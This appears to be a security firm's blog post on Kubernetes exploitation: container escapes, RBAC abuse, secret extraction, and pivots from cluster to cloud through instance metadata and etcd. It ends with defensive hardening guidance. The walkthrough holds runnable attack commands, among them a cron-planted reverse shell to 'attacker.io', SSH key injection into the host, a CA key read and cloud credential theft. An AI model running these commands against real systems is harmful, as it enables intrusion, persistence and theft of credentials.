Kubernetes adoption has outpaced Kubernetes security by a wide margin. Organizations migrate workloads into clusters faster than their security teams can learn the platform's attack surface — and that gap is consistently exploitable. In our Kubernetes penetration tests and cloud security assessments, we achieve cluster-admin from an initial compromised pod in the majority of engagements. The techniques are not novel. The misconfigurations that enable them are simply pervasive.
This post walks through the exact exploitation chain we follow: identifying misconfigurations at the pod level, escaping the container, abusing RBAC to escalate across namespaces, extracting secrets, and ultimately pivoting from the Kubernetes cluster into the underlying cloud account.
Common Kubernetes Misconfigurations
Before any exploitation begins, reconnaissance inside a compromised pod surfaces a predictable set of weaknesses. Across dozens of Kubernetes assessments, the following misconfigurations appear with enough regularity that we treat them as the expected baseline rather than outliers.
Privileged Pods
Pods running with securityContext.privileged: true receive near-complete access to the host kernel. A privileged container shares the host's device namespace, can load kernel modules, and can mount any host filesystem path. This single flag collapses the container boundary entirely.
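A minimal manifest showing the flag in context (the pod name and image here are illustrative):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: debug-shell          # innocuous-looking name, common in real findings
spec:
  containers:
    - name: shell
      image: ubuntu:22.04
      command: ["sleep", "infinity"]
      securityContext:
        privileged: true     # collapses the container boundary described above
```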
hostPath Mounts
Mounting host filesystem paths into a container — even read-write mounts of innocuous-looking paths like /var/log — provides lateral movement opportunities. Writable hostPath volumes pointed at sensitive directories such as /etc, /root, or the container runtime socket allow direct host compromise.
Overly Permissive RBAC
ClusterRoleBindings that grant cluster-admin to default service accounts, wildcard verb permissions across core API groups, or the ability to create pods and exec into them are among the most common RBAC findings we document. Many teams grant broad permissions during development and never tighten them before production.
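A representative binding of the kind described, with illustrative names — one line of YAML that hands full cluster control to every pod in the `default` namespace:

```yaml
# Grants cluster-admin to the default service account in the default
# namespace; any pod running there inherits full cluster control.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: dev-convenience      # illustrative name
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: default
    namespace: default
```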
Exposed API Servers
The Kubernetes API server is frequently reachable from inside cluster workloads without authentication controls. Anonymous authentication enabled, or API servers bound to 0.0.0.0 without network policy restrictions, allow any pod to enumerate the cluster and attempt privilege escalation directly against the API.
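A quick in-pod probe for this condition, assuming only `curl` is available (these commands require a live cluster and so are a sketch, not a transcript):

```shell
# From any pod, probe the in-cluster API server without credentials.
# kubernetes.default.svc resolves from every pod; -k skips TLS verification.
curl -sk https://kubernetes.default.svc/api/v1/namespaces
# A 200 response with resource data means anonymous access is effective;
# a 401/403 Status object means authentication is enforced.
# Anonymous requests are attributed to system:anonymous / system:unauthenticated.
curl -sk https://kubernetes.default.svc/version
```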
Default Service Account Tokens
Prior to Kubernetes 1.24, service account tokens were automatically mounted into every pod by default. Many clusters still run workloads that inherit this behaviour or explicitly set automountServiceAccountToken: true. These tokens, readable at /var/run/secrets/kubernetes.io/serviceaccount/token, authenticate directly to the API server.
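The mounted token is a JWT, so its payload can be decoded without any signature check to see which service account and namespace it represents. A small helper, assuming a POSIX shell with `base64` available:

```shell
# Decode the payload of a service account token (a JWT) to identify it.
# No signature verification is performed; this only reads the claims.
decode_jwt_payload() {
  # take the middle segment, map base64url to base64, restore padding
  seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  while [ $(( ${#seg} % 4 )) -ne 0 ]; do seg="${seg}="; done
  printf '%s' "$seg" | base64 -d
}

# Typical use inside a pod, with the mount path from above:
# decode_jwt_payload "$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"
# The payload includes "sub":"system:serviceaccount:<namespace>:<name>".
```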
Pod Escape Techniques
With a foothold inside a container, the objective shifts to breaking out of the container namespace and gaining access to the underlying node. The method depends on what misconfigurations are present.
Privileged Container Breakout
A privileged container exposes all host block devices. By mounting the host root filesystem, an attacker gains read-write access to every file on the node — including /etc/crontab, SSH authorized keys, and the kubelet configuration.
# Inside a privileged container — list host block devices
ls /dev/sd* /dev/nvme*
# Mount the host root filesystem
mkdir /tmp/hostfs
mount /dev/nvme0n1p1 /tmp/hostfs
# Read node credentials or write to crontab for persistence
cat /tmp/hostfs/etc/kubernetes/pki/ca.key
echo '* * * * * root bash -i >& /dev/tcp/attacker.io/4444 0>&1' \
>> /tmp/hostfs/etc/crontab
hostPID and hostNetwork Abuse
Pods launched with hostPID: true share the host process namespace. Every process running on the node is visible and accessible — including processes belonging to other containers. Combined with nsenter, an attacker can attach to the host's PID 1 namespace and execute commands as root on the underlying node.
# hostPID pod — view all host processes
ps aux
# Enter the host's mount namespace via PID 1
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# Now executing on the host node as root
whoami # root
hostname # node-worker-01
Pods with hostNetwork: true share the host network stack. This provides access to services bound only to localhost on the node — including the kubelet API on port 10250 and the etcd client port on control plane nodes.
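From a hostNetwork pod, the kubelet's localhost-bound API is within reach. If the kubelet permits anonymous or unauthorized requests, its read and exec endpoints are directly usable; the path parameters below are placeholders for values taken from the pod listing:

```shell
# From a hostNetwork pod: if anonymous kubelet auth is enabled,
# /pods lists every pod scheduled on this node
curl -sk https://127.0.0.1:10250/pods
# Execute a command inside an arbitrary container on the node
# (<namespace>/<pod>/<container> come from the /pods output)
curl -sk -X POST \
  "https://127.0.0.1:10250/run/<namespace>/<pod>/<container>" \
  -d "cmd=id"
```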
Mounting the Host Filesystem via Writable hostPath
Even without privileged mode, a writable hostPath volume targeting a sensitive directory achieves host compromise. The classic path is overwriting the host's SSH authorized keys or dropping a cron entry.
# Pod spec (fragment) — writable hostPath to /root
volumes:
  - name: host-root
    hostPath:
      path: /root
      type: DirectoryOrCreate
containers:
  - volumeMounts:
      - name: host-root
        mountPath: /root-host
# Inside the pod — write attacker SSH key to host root
mkdir -p /root-host/.ssh
echo 'ssh-ed25519 AAAAC3Nz... attacker' >> /root-host/.ssh/authorized_keys
# SSH directly to the node
ssh root@<node-ip>
Exploiting the Container Runtime Socket
A hostPath mount exposing the Docker or containerd socket (/var/run/docker.sock or /run/containerd/containerd.sock) is equivalent to root on the host. An attacker can use the socket to launch a new privileged container with a full host mount and execute arbitrary commands outside of any namespace boundary.
# Docker socket exposed — launch privileged container with host mount
docker -H unix:///var/run/docker.sock run -it --privileged \
--pid=host --net=host \
-v /:/host \
ubuntu:22.04 chroot /host bash
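When only the containerd socket is mounted, the same breakout works through `ctr`. A sketch, assuming the `ctr` client is present in the pod and the node can pull the image:

```shell
# containerd socket exposed — equivalent breakout via ctr
ctr -a /run/containerd/containerd.sock image pull docker.io/library/ubuntu:22.04
ctr -a /run/containerd/containerd.sock run --rm -t --privileged \
  --mount type=bind,src=/,dst=/host,options=rbind:rw \
  docker.io/library/ubuntu:22.04 breakout \
  chroot /host bash
```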
RBAC Exploitation
Even without a direct container escape, a compromised pod with a permissive service account token can achieve cluster-wide access entirely through the Kubernetes API. RBAC misconfigurations are, in our experience, the most reliable path to cluster-admin.
Enumerating Service Account Permissions
The first step after obtaining a service account token is enumerating what it can do. The kubectl auth can-i --list command reveals every permitted action for the current identity.
# Read the mounted service account token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
# Enumerate permissions
kubectl auth can-i --list \
--server=$APISERVER \
--token=$TOKEN \
--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
Secrets Listing and Extraction
A service account with get or list on the secrets resource in any namespace can extract every secret visible to it — including other service account tokens, TLS certificates, database credentials, and API keys stored by applications.
# List all secrets across all namespaces
kubectl get secrets --all-namespaces \
--server=$APISERVER --token=$TOKEN \
--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Extract a specific secret
kubectl get secret prod-db-credentials -n production -o jsonpath='{.data.password}' \
  --server=$APISERVER --token=$TOKEN \
  --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
  | base64 -d
# .data holds one base64-encoded value per key, so decode keys individually
Role Binding Enumeration and Escalation
Enumerating ClusterRoleBindings and RoleBindings surfaces which service accounts hold elevated permissions. A common escalation path involves locating a service account with cluster-admin binding, then finding a pod running with that service account and extracting its token — or creating a new pod that uses it.
# Find all ClusterRoleBindings for cluster-admin
kubectl get clusterrolebindings -o json \
| jq '.items[] | select(.roleRef.name=="cluster-admin") | .subjects'
# If we can create pods, launch one using the privileged service account
# (kubectl removed --serviceaccount in 1.24; use --overrides instead)
kubectl run pwn --image=ubuntu --restart=Never -it \
  --overrides='{"spec":{"serviceAccountName":"admin-sa"}}' \
  -- /bin/bash
Impersonation
A service account with the impersonate verb on users, groups, or service accounts can act as any identity in the cluster without needing their credentials. This is a direct path to cluster-admin if the permission is granted broadly.
# Impersonate a member of the system:masters group — always bound to
# cluster-admin — via the kubectl --as and --as-group flags
kubectl get secrets --all-namespaces \
  --as=admin --as-group=system:masters \
  --server=$APISERVER --token=$TOKEN \
  --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Create a persistent ClusterRoleBinding while impersonating
kubectl create clusterrolebinding attacker-admin \
  --clusterrole=cluster-admin \
  --serviceaccount=default:default \
  --as=admin --as-group=system:masters \
  --server=$APISERVER --token=$TOKEN \
  --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
Escalating from Namespace-Scoped to Cluster-Scoped Access
Many teams apply RBAC restrictions at the namespace level, believing this contains the blast radius of a compromised pod. In practice, several paths cross namespace boundaries. A service account with create on pods in any namespace can launch a pod that mounts hostPath volumes, escaping to the node and then reading tokens belonging to higher-privileged pods running anywhere on that node.
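That escalation can be packaged into a single pod manifest: a hostPath mount of the kubelet's pod directory exposes every other pod's mounted service account token on the node. The names below are illustrative:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: token-harvester        # illustrative name
spec:
  containers:
    - name: shell
      image: ubuntu:22.04
      command: ["sleep", "infinity"]
      volumeMounts:
        - name: kubelet-pods
          mountPath: /host-pods
          readOnly: true
  volumes:
    - name: kubelet-pods
      hostPath:
        path: /var/lib/kubelet/pods   # holds each pod's mounted secrets/tokens
# Inside the pod: find /host-pods -name token  surfaces every token on the node.
```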
From Cluster to Cloud
Achieving cluster-admin is rarely the end of the engagement. The Kubernetes cluster itself runs inside a cloud account, and that cloud account typically has far broader access to the organization's infrastructure. The pivot from cluster to cloud is often the highest-impact finding we deliver.
Cloud Instance Metadata Service (IMDS) Exploitation
Every node in a managed Kubernetes cluster (EKS, GKE, AKS) runs on a cloud VM that has access to the Instance Metadata Service. From inside any pod that can reach the node's network namespace — or directly from a hostNetwork pod — the IMDS is reachable and returns the node's IAM credentials.
# AWS IMDS — retrieve node IAM role credentials (IMDSv1)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns the role name, e.g.: eks-node-role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-node-role
# Returns AccessKeyId, SecretAccessKey, Token
# GCP metadata server — retrieve service account token
curl -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure IMDS — retrieve managed identity token
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
EKS — Node IAM Role to AWS Account Pivot
EKS nodes are EC2 instances with an attached IAM instance profile. The permissions granted to this role commonly include read access to ECR, SSM Parameter Store, and Secrets Manager — all of which may contain credentials for other AWS services. In several engagements, the node role provided ec2:DescribeInstances and ssm:GetParameter across the entire account, yielding database passwords, third-party API keys, and cross-account role ARNs.
# Use extracted node credentials to enumerate the AWS account
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
# Identify the role and account
aws sts get-caller-identity
# List SSM parameters
aws ssm describe-parameters --region ca-central-1
# Retrieve a specific parameter
aws ssm get-parameter --name /prod/database/password --with-decryption
GKE — Workload Identity and Default Compute SA
GKE clusters that have not enabled Workload Identity use the Compute Engine default service account for all node VMs. This account has the Editor role on the project by default — granting read and write access to nearly every GCP resource including Cloud Storage buckets, Cloud SQL instances, and Secret Manager secrets. A single hostNetwork pod or IMDS-accessible workload yields project-level access.
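The pivot is two curl commands, sketched here against a live metadata server; `PROJECT_ID` is a placeholder for the value the metadata server also exposes:

```shell
# Retrieve the node service account's OAuth access token from the metadata server
TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
  | grep -o '"access_token":"[^"]*"' | cut -d'"' -f4)
# With the default compute SA's Editor role, project resources open up,
# e.g. enumerating Cloud Storage buckets in the project
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://storage.googleapis.com/storage/v1/b?project=PROJECT_ID"
```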
Secrets Stored in etcd
On clusters where we achieve access to the control plane or can communicate directly with etcd, all Kubernetes secrets are retrievable in plaintext — etcd does not encrypt data at rest unless explicitly configured to do so. This includes every service account token, TLS private key, and application secret stored in the cluster.
# Query etcd directly (from control plane node or via hostNetwork pod)
ETCDCTL_API=3 etcdctl \
--endpoints=https://127.0.0.1:2379 \
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
--cert=/etc/kubernetes/pki/etcd/server.crt \
--key=/etc/kubernetes/pki/etcd/server.key \
get /registry/secrets --prefix --keys-only
# Retrieve and decode a specific secret
ETCDCTL_API=3 etcdctl ... get /registry/secrets/production/prod-db-credentials \
| strings | grep -A5 password
Defensive Guidance
The Kubernetes attack surface is large, but the controls required to close the most critical paths are well defined. The following hardening measures address every technique described in this post.
- Enforce Pod Security Standards. Apply the `restricted` Pod Security Standard at the namespace level using the built-in admission controller. This blocks privileged containers, hostPID, hostNetwork, and hostPath mounts by default. Audit mode should be active on all namespaces and enforce mode on production workloads.
- Disable automounting of service account tokens. Set `automountServiceAccountToken: false` in the default ServiceAccount spec for every namespace. Mount tokens explicitly only in pods that require API server access, and scope those service accounts to the minimum required permissions.
- Implement least-privilege RBAC. Audit ClusterRoleBindings and RoleBindings regularly. Remove wildcard verb grants, `cluster-admin` assignments to non-administrative service accounts, and any binding that grants `secrets` list or get across all namespaces. Use tools such as rbac-audit or rakkess to surface overly permissive bindings.
- Enable etcd encryption at rest. Configure the API server's `--encryption-provider-config` to encrypt secrets stored in etcd using AES-GCM or a KMS provider. This ensures that even direct etcd access does not yield plaintext secrets.
- Restrict IMDS access with network policy. Apply egress NetworkPolicy rules that block pod access to `169.254.169.254` for workloads that do not require cloud IAM credentials. On AWS, enforce IMDSv2 at the node level to require session-oriented token requests, which are significantly harder to abuse from within a pod.
- Use Workload Identity instead of node-level IAM roles. On GKE, enable Workload Identity. On EKS, use IAM Roles for Service Accounts (IRSA). These mechanisms bind IAM permissions to specific Kubernetes service accounts rather than to the entire node, eliminating the IMDS lateral movement path for workloads that do not require cloud credentials.
- Never expose the container runtime socket. Docker and containerd socket mounts should be blocked via admission control. There is no legitimate application workload that requires runtime socket access — only monitoring and CI tooling, which should use purpose-built alternatives.
- Audit API server access logs. Enable audit logging on the Kubernetes API server and ship logs to a SIEM. Alert on anomalous patterns: `secrets list` from unexpected service accounts, `pods create` with privileged security contexts, and any use of the `impersonate` verb outside of known automation service accounts.
- Run periodic Kubernetes penetration tests. Configuration drift is inevitable in dynamic cluster environments. A scheduled external assessment — not just automated scanning — provides the adversarial perspective required to identify chained exploitation paths that individual tools miss.
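The IMDS restriction above can be expressed as a default egress policy. A sketch — the namespace is illustrative, and the cluster's CNI must actually enforce NetworkPolicy for this to take effect:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-imds-egress
  namespace: production        # illustrative; apply per workload namespace
spec:
  podSelector: {}              # selects every pod in the namespace
  policyTypes:
    - Egress
  egress:
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              - 169.254.169.254/32   # the cloud metadata endpoint
```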